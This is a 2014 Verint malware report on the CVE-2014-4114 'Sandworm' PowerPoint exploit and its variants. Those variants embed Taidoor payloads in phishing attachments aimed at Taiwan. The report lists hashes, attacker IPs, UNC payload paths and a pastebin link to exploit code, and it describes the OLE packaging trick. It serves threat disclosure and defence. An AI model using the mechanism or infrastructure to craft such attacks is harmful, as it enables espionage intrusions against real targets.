Verint Discovers Smart Variant of Zero-Day Sandworm

1

Malware Report | October 2014

Verint Discovers Smart Variant of Zero-DaySandworm CVE-2014-4114

Verint Discovers Smart Variant of Zero-Day Sandworm

Verint Discovers Smart Variant of Zero-Day Sandworm CVE-2014-4114

Severity: Extremely dangerous

Timeline

Background

Lstudio Joins the Party

Taiwan—the Frontline for APT Cyberwar

Appendix: CVE-2014-4114 APT emails Hitting Taiwan

Verint. Powering Actionable Intelligence®

TABLE OF CONTENTS

Unauthorized use, duplication, or modification of this document in whole or in part without the written consent of Verint Systems Inc. is strictly prohibited.By providing this document, Verint Systems Inc. is not making any representations regarding the correctness or completeness of its contents and reserves the right to alter this document at any time without notice.Features listed in this document are subject to change. Please contact Verint for current product features and specifications.All marks referenced herein with the ® or TM symbol are registered trademarks or trademarks of Verint Systems Inc. or its subsidiaries. All rights reserved. All other marks are trademarks of their respective owners.© 2014 Verint Systems Inc. All rights reserved worldwide.

1

1

1

2

5

9

10

11

Verint Discovers Smart Variant of Zero-Day Sandworm

1

VERINT DISCOVERS SMART VARIANT OF ZERO-DAY SANDWORM CVE-2014-4114Severity: Extremely dangerousThe Verint® Research team has discovered new sophisticated variants to the CVE-2014-4114 Russian cyber-espionage campaign targeting NATO, European Union, Telecommunications and Energy sectors—See more at: http://www.isightpartners.com/2014/10/cve-2014-4114/. The malware, called sandworm, which was originally discovered by iSight Partners, utilized the zero-day vulnerability that Microsoft later published as MS14-060 security advisory on October 14th, see https://technet.microsoft.com/en-us/library/security/ms14-060.aspx.

In less than a week, starting on October 17th, the Verint research team discovered several more cases of targeted attacks using the CVE-2014-4114 exploit. The attack is delivered via emails with infected PowerPoint file (e.g. pptx or ppsx) attachments. To date, the payload was thought to be located at a remote site to be downloaded via SMB. However, on October 18th, the Verint team discovered an enhanced version of the malware with the payload embedded in the PPT attachment.

The exploit leverages a feature of Microsoft PowerPoint file rather than vulnerability, making it difficult to detect. In other words there is no need for the adversary to write complicated shellcode like ROP (Return-oriented Programming). The malware is very stable and it can be triggered for versions after Office 2007. It can be relied upon to bypass most security controls, and it is powerful enough to run any program.

Once the malware is downloaded it begins communicating over HTTP or immediately starts exfiltrating basic meta-data of the compromised machine, such as the computer name and MAC address to enable the adversary to follow up with more sophisticated stage-two malware. The Verint team has identified the malware communicating to IP addresses in Hong Kong, South Korea, Argentina and the USA.

At the date of publication the new variant is still evading worldwide antiviruses with no discoveries available on Virustotal.com. Verint Threat Protection System identifies both variants (embedded and remote) of the CVE-2014-4114 exploit.

Timeline:2013-06 Exploit may have first been discovered and put into use by APT adversaries2014-09 Security vendor iSight found samples of the attack and alerted Microsoft2014-10-14 Microsoft released security advisory, PowerPoint software patch and iSIGHT Partners released a whitepaper on the exploit.2014-10-15 Crimeware/Exploit Pack started to leverage this exploit, send spam emails2014-10-16 APT samples hitting Taiwan using remote malware payload2014-10-18 Verint discovers APT using embedded malware payload2014-10-23 Verint publishes Malware Finding.

Verint Discovers Smart Variant of Zero-Day Sandworm

2

BackgroundAccording to iSIGHT Partners, the exploit, called sandworm, was first seen September this year. Microsoft released a security advisory as well as a patch for all its supported software on October 14th. Since that date, attackers have been exploiting unpatched operating systems. Below is a snapshot of the earliest CVE-2014-4114 sample file named spiski_deputatov_done.ppsx with MD5 hash as 330E8D23AB82E8A0CA6D166755408EB1.

The attacker placed the malware payload at a remote site, 94.185.85.122 and used UNC (SMB/WebDav—enables files to be seamlessly shared between folders over HTTP ) to send the malware file. Though its file extension is gif, it’s actually a binary executable. This technique is widely used in spreading banking trojan and crimeware, but is used in APT attacks because the compromised machine needs to communicate with a remote server in order to execute the attack, making it less reliable, and it increases the risk of the adversary’s C2 IP being tracked.

Verint Discovers Smart Variant of Zero-Day Sandworm

3

An example of an email infected with CVE-2014-4114 and identified by Verint static file analysis is shown below. It reads that it is from Hong Kong protestors and is calling on people join the protest.

Below is a snapshot of the section of code that exploits the CVE-2014-4114 vulnerability.

Email with embedded malware

On October 18th, the Verint research team discovered another CVE-2014-4114 attack that uses embedded malware payload rather than collecting the malware from a remote site. This email is the world’s first improved version of CVE-2014-4114 that uses embedded malware payload rather than a UNC remote download.

The malware points to a remote site 110.80.25.212 with a UNC path.

Verint Discovers Smart Variant of Zero-Day Sandworm

4

Email with embedded malware

CVE-2014-4114 with APT Malware Embedded

The attachment name is “從地方開始，贏回台灣.ppsx” (its MD5 hash is 7C8A1 4E6B070ED77845608734E2C90A4), which means encouraging votes for the right-wing political party.

Verint Discovers Smart Variant of Zero-Day Sandworm

5

Lstudio Joins the PartyImmediately, following the discovery of this email, Verint uncovered a similar attack launched by the Lstudio group.

Verint Discovers Smart Variant of Zero-Day Sandworm

6

Infected email from Lstudio

The file is named as “專家提醒各器官如何防癌.ppsx” with MD5 hash of 7c8a14e6b070ed77845608734e2c90a4. This email claims to be from cancer experts advising on cancer prevention.

Verint Discovers Smart Variant of Zero-Day Sandworm

7

The below screenshot indicates this attack also embeds malware (a binary executable file disguised as a PNG ) inside the PowerPoint slides.

Verint Discovers Smart Variant of Zero-Day Sandworm

8

Verint Behavioural Analysis discovers communications

Verint automatic behavioral analysis report of the advanced attack is shown below:

Verint Discovers Smart Variant of Zero-Day Sandworm

9

Interestingly, a year ago (2013/6), a reference code of CVE-2014-4114 implementation was once available at http://pastebin.com/raw.php?i=2szJtZhG and has since been removed, in other words this exploit might have been used for highly-targeted victims 18 months before Microsoft had released the security advisory and patch.

Taiwan—the Frontline for APT CyberwarThe advanced adversary improved their weapons in only two days. The new variants of CVE-2014- 4114 now contains a CompObj stream in the oleobject (for more details of the feature, refer to Microsoft MSDN, https://social.msdn.microsoft.com/Forums/en-US/c2044da9-a7a6-40ba-ae45- 4ffd07d4178b/olenativestream-structure-doesnt-match-the-documentation and http://msdn.microsoft.com/en-us/library/dd942447(v=PROT.10).aspx) where this additional compobj would make the OLENative object be treated as a package of (exe, inf), then able to be triggered and installed locally. The Verint team was not surprised to find that the embedded malware is the common Taidoor malware, a well known adversary that has been actively targeting Taiwan since 2003.

Verint has discovered multiple instances of CVE-2014-4114 infected emails in the last weeks.

Note about the vulnerability in Pastebin.com in September 2013

At the date of publication the new variant was still evading worldwide antiviruses with no instances of its existence on Virustotal.com

Verint Discovers Smart Variant of Zero-Day Sandworm

10

Verint recently discovered numerous CVE-2014-4114 infected emails at multiple government organizations using Verint Advanced Threat Protection.

APPENDIX: CVE-2014-4114 APT EMAILS HITTING TAIWAN

The malware points to a remote site 110.80.25.212 with a UNC path.

13

About Verint Systems Inc.Verint® (Nasdaq: VRNT) is a global leader in Actionable Intelligence® solutions with a focus on customer engagement optimization, security intelligence, and fraud, risk and compliance. Today, more than 10,000 organizations in 180 countries — including over 80 percent of the Fortune 100 — count on intelligence from Verint solutions to make more informed, effective and timely decisions.

w w w . v e r i n t . c o m / c y b e r | I n f o . c y b e r @ v e r i n t . c o m